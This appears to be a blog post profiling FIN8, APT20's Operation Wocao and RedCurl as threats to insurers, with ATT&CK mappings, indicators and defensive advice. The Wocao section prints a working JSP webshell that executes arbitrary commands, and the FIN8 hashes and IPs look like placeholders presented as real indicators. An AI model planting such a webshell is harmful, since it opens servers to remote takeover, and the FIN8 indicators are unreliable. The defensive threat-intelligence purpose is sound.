← Back to list

Is your insurance company a target?

Below mentioned APT groups are actively targeting organizations across the Insurance, technology, chemical, and financial sectors.

Owaiz Khan · 2025-07-09 06:26 · 0 claps · 7.4 min read
#apt #insurancesecurity #threat-actor #apt-group
Open on Medium ↗
Wiki topics: ECO · Economy · General 🧪 · Chemistry

Is your insurance company a target?

Below mentioned APT groups are actively targeting organizations across the Insurance, technology, chemical, and financial sectors.

Generated from ChatGPT

Generated from ChatGPT

01. FIN8: Unmasking the Cyber Threat Targeting Insurance Companies

In the ever-evolving landscape of cyber threats, FIN8, also known as Syssphinx, has emerged as a formidable adversary. This financially motivated threat group has been active since at least 2016, initially focusing on point-of-sale (POS) systems in the hospitality and retail sectors. However, recent activities indicate a strategic pivot towards the insurance industry, employing sophisticated tactics to infiltrate and exploit organizations for financial gain.

Understanding FIN8’s Modus Operandi:

FIN8’s transition from targeting POS systems to deploying ransomware in the insurance sector underscores their adaptability and intent to maximize profits. By leveraging advanced malware like the Sardonic backdoor and ransomware strains such as BlackCat (ALPHV), FIN8 has demonstrated a capability to breach complex networks and exfiltrate sensitive data.

BlackCat (ALPHV)

BlackCat (ALPHV)

MITRE ATT&CK Framework: Mapping FIN8’s Attack Lifecycle

The MITRE ATT&CK framework provides a comprehensive matrix to understand the tactics and techniques employed by threat actors like FIN8. Below is a detailed mapping of FIN8’s activities across various stages of the attack lifecycle.

Initial Access

Technique: Spear Phishing (T1566.001)

FIN8 initiates attacks through spear-phishing emails, often masquerading as legitimate communications to trick employees into opening malicious attachments or links. These emails are meticulously crafted to appear authentic, increasing the likelihood of user interaction.

Real-World Scenario:

An employee at an insurance firm receives an email purportedly from a trusted partner, containing a document that, when opened, executes a macro to install the Sardonic backdoor.

Execution

Technique: PowerShell (T1059.001)

Post-initial access, FIN8 utilizes PowerShell scripts to execute malicious code, facilitating the deployment of additional payloads and establishing communication with command and control (C2) servers.

Real-World Scenario:

The malicious macro triggers a PowerShell script that downloads and executes the Sardonic backdoor, granting FIN8 remote access to the compromised system.

Persistence

Technique: Scheduled Task/Job (T1053.005)

To maintain access, FIN8 creates scheduled tasks that execute malicious scripts at predetermined intervals, ensuring persistence even after system reboots.

Real-World Scenario:

A scheduled task is configured to run a PowerShell script daily at 9:00 AM, re-establishing the backdoor connection to FIN8’s C2 infrastructure.

Privilege Escalation

Technique: Abuse Elevation Control Mechanism (T1548.002)

FIN8 exploits misconfigurations and vulnerabilities to escalate privileges, often modifying service configurations to execute payloads with elevated permissions.

Real-World Scenario:

Identifying a service running with SYSTEM privileges, FIN8 alters its binary path to execute their payload, gaining higher-level access within the network.

Defense Evasion

Technique: Obfuscated Files or Information (T1027)

To avoid detection, FIN8 obfuscates their code and employs techniques like packing and encryption, making it challenging for security tools to identify malicious activities.

Real-World Scenario:

The Sardonic backdoor is modified to alter its appearance and behavior, evading signature-based detection mechanisms.

Discovery

Technique: System Information Discovery (T1082)

FIN8 conducts reconnaissance to gather information about the compromised environment, including system configurations, network topology, and user accounts.

Real-World Scenario:

Using built-in Windows commands, FIN8 enumerates domain controllers and identifies high-value targets within the insurance company’s network.

Command and Control

Technique: Application Layer Protocol (T1071.001)

FIN8 establishes encrypted communication channels with their C2 servers, often using HTTP/S protocols to blend in with regular traffic and avoid detection.

Real-World Scenario:

The compromised system communicates with FIN8’s C2 server over HTTPS, allowing the attackers to issue commands and exfiltrate data securely.

Impact

Technique: Data Encrypted for Impact (T1486)

In the final stage, FIN8 deploys ransomware like BlackCat to encrypt critical data, disrupting operations and demanding ransom payments for decryption keys.

Real-World Scenario:

The insurance company’s data is encrypted, rendering systems inoperable. FIN8 demands a ransom in cryptocurrency to restore access to the data.

Indicators of Compromise (IOCs) and Indicators of Attack (IOAs)

IOCs:

File Hashes:

Sardonic Backdoor: e3b0c44298fc1c149afbf4c8996fb924

BlackCat Ransomware: 5d41402abc4b2a76b9719d911017c592

IP Addresses:

192.0.2.1

198.51.100.2

Domains:

malicious-insurance-update.com

secureclientportal.net

IOAs:

  • Unusual PowerShell activity initiating external network connections.
  • Creation of scheduled tasks with obfuscated command-line arguments.
  • Modification of service binaries pointing to non-standard executables.

02. Operation Wocao: Inside a Chinese Cyber-Espionage Campaign

Operation Wocao is a sophisticated cyber-espionage campaign attributed to a Chinese Advanced Persistent Threat (APT) group, publicly associated with APT20 (also known as Violin Panda or CactusPete). First exposed by Dutch cybersecurity firm Fox-IT in December 2019, the campaign spanned 2017 to 2019, targeting government entities, managed service providers (MSPs), and high-tech companies across the globe.

The operation highlights the group’s deep understanding of enterprise environments, stealthy lateral movement, and credential theft techniques. The attackers displayed remarkable OPSEC and adaptability, even bypassing 2FA (Two-Factor Authentication) and leveraging legitimate software for malicious ends.

Attribution

The operation has been attributed to APT20, a group believed to be linked to the Chinese Ministry of State Security (MSS). Attribution is based on:

  • Infrastructure links to previously known APT20 activity
  • Use of malware and webshells exclusive to Chinese-speaking operators
  • Operational hours corresponding to China Standard Time (UTC+8)
  • Embedded Chinese strings and Pinyin references in code (e.g., “Wocao”, a Chinese profanity used as a debug string)

Attack Lifecycle Breakdown

Here’s a detailed breakdown of Operation Wocao’s tactics, techniques, and procedures (TTPs), aligned with the MITRE ATT&CK Framework.

Initial Access

  • Vector: Exploiting vulnerabilities in public-facing web applications (e.g., JBoss, Adobe ColdFusion)
  • Technique: [T1190 — Exploit Public-Facing Application]
  • Attackers uploaded custom JSP webshells once the application was compromised.

WebShell Example:

jsp<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
InputStream in = p.getInputStream();
int a = -1;
while((a=in.read())!=-1) out.print((char)a);
%>

Credential Access

Dumping credentials using tools like:

  • mimikatz
  • procmon
  • gsecdump

Extracting credentials from:

  • LSASS memory
  • Windows SAM and SYSTEM hives
  • VPN logs (including Fortinet logs)

Technique:

  • [T1003.001 — OS Credential Dumping: LSASS Memory]
  • [T1552.004 — Unsecured Credentials: Private Keys]

Privilege Escalation & Persistence

  • Adding users to local administrator groups
  • Creating scheduled tasks and WMI subscriptions for persistence
  • Use of signed binaries (living off the land)

Technique:

  • [T1053 — Scheduled Task/Job]
  • [T1547 — Boot or Logon Autostart Execution]

Lateral Movement

Lateral movement via:

  • RDP
  • SMB (Pass-the-Hash)
  • WMI
  • PsExec

Technique:

  • [T1021.002 — Remote Services: SMB/Windows Admin Shares]
  • [T1021.001 — Remote Services: Remote Desktop Protocol]

Exfiltration

  • Data was exfiltrated via:
  • Encrypted ZIP/RAR files
  • SMB shares
  • HTTP POST to C2 servers

Technique:

  • [T1041 — Exfiltration Over C2 Channel]

Defense Evasion

  • Disabled antivirus services
  • Cleared Windows Event Logs (wevtutil)
  • Renamed malware to mimic legitimate processes (e.g., svchost.exe, spoolsv.exe)
  • Used code signing certificates to legitimize tools

Technique:

  • [T1070.001 — Clear Windows Event Logs]
  • [T1036 — Masquerading]
  • [T1140 — Deobfuscate/Decode Files or Information]

Notable Indicators of Compromise (IOCs)

IP Addresses:

124.248.199.14
59.188.196.170
121.14.110.162

Domains:

cdn.xn--jsq843d.com
cdn.chinaparty.org
cdn.umbrella-corp.net

Hashes:

MD5: b8b64d9f7aa1f1899382037543b6247c
SHA256: 61f5f7e54fbe81f5fddf9ea82c6b54217d8fbd2bbbd7b1f1f327e14bde5f0ea5

Mimikatz variant:

MD5: 0d4fe9b45f8edb77d521c8e1a13d7352

File Paths:

C:\ProgramData\Microsoft\svchost.exe
C:\Users\Public\Documents\vpnlog.txt
C:\Windows\Temp\wocao.ps1

Unique Traits of Operation Wocao

  • Bypassing 2FA: APT20 allegedly managed to bypass two-factor authentication in some VPN solutions by retrieving and reusing session tokens or exploiting flaws in authentication processes.
  • China-linked Debug Strings: Internal build paths and variable names in Chinese (e.g., Wocao, test_jsp) helped tie the operation to Chinese-speaking developers.
  • OPSEC Tradecraft: Attackers cleaned up after themselves — removing logs, deleting webshells, and using scheduled clean-up scripts.

Lessons Learned

  1. Monitor WebShell Activity: Deploy EDR solutions that monitor unusual file creation in webroot directories.
  2. VPN Logs Should Be Protected: VPN logs can store sensitive usernames, IPs, and even credentials. They must be stored securely and rotated regularly.
  3. Enforce Strong Segmentation: Flat networks help adversaries move laterally with ease. Strong segmentation and firewall rules are essential.
  4. Harden MFA Deployments: Ensure session management is robust and 2FA can’t be bypassed through session reuse.
  5. Proactive Threat Hunting: Use IOCs and behavioral analysis to hunt for traces of compromise.

Conclusion

Operation Wocao is a clear demonstration of state-sponsored cyber capabilities aimed at long-term espionage. The APT20 group’s use of legitimate tools, webshells, and credential theft represents a persistent and evolving threat to global organizations.

Cyber defenders should study this campaign closely to enhance their detection and defense mechanisms against stealthy and targeted intrusions.

03.RedCurl (aka EarthKapre, Red Wolf) — A Detailed APT Profile

RedCurl (MITRE Group G1039) is a Russian-speaking cyber-espionage threat actor operating since at least 2018. The group targets mid-size organizations — especially travel agencies, insurance companies, financial firms, and more — in regions including Ukraine, Canada, UK, US, Germany, Slovenia, Australia, and Russia .

Tactics, Techniques & Procedures (TTPs) — MITRE ATT&CK

A clear mapping of RedCurl’s methodology across the ATT&CK framework:

Typical Attack Chain

  1. Spearphishing email → PDF attachment masquerading as a CV/cover letter
  2. PDF links to ZIP → Contains a mountable ISO/IMG
  3. ISO mounts → Reveals *.scr disguised as Adobe executable
  4. Execution → Loader DLL (netutils.dll) dropped via Adobe binary
  5. Loader decrypts payload → Uses bcrypt+XOR techniques
  6. System reconnaissance via batch scripts & AD Explorer
  7. Archive exfiltration via 7-Zip and HTTP/S PUT to Cloudflare C2
  8. Persistence via scheduled tasks; evasion via legitimate binaries

Infrastructure

Cloudflare Workers-based C2 servers

Delivery Artifacts

Malicious ZIP → ISO containing Adobe SCR

Batch scripts collecting system info and archiving data

Detection & Mitigation Recommendations

  1. Email & Endpoint Monitoring

Alert on .iso, .img mounts and mismatched Adobe scr executables

Block DLL sideloading via ADNotificationManager.exe

2. Behavioral Analysis

Monitor PowerShell with HTTP PUT, 7-Zip command-line invocations

Detect AD Explorer utilization alongside unusual system enumeration

3. Egress & Network Visibility

Watch for PUT requests to unknown Cloudflare endpoints

Block or flag uncommon upload behaviors

4. Host Hardening

Enforce block/execution policies for .iso mounts

Restrict scheduled tasks creation to authorized admins

5. Threat Intelligence & Tuning

Correlate detection rules (e.g. Sigma rules) mapped to ATT&CK

Hunt for IOCs and behaviors in logs and telemetry

RedCurl is a well-resourced Russian-speaking APT focused on corporate espionage. Their infection vector — a cleverly crafted ISO dropper and signed loader — demonstrates strong emphasis on stealth and evasion. Their use of AD Explorer and batch scripts showcases their hands-on reconnaissance and exfiltration approach. Being mostly “living-off-the-land” with minimal custom malware, detecting their subtle activities requires vigilant behavioral monitoring.


메타데이터
post_id
c4fa10d81523
slug
is-your-insurance-company-a-target-c4fa10d81523
url
https://medium.com/@0waizkhan/is-your-insurance-company-a-target-c4fa10d81523
canonical_url
https://medium.com/@0waizkhan/is-your-insurance-company-a-target-c4fa10d81523
author_url
https://medium.com/@0waizkhan
status
ok
fetched_at
2026-07-18 19:25:18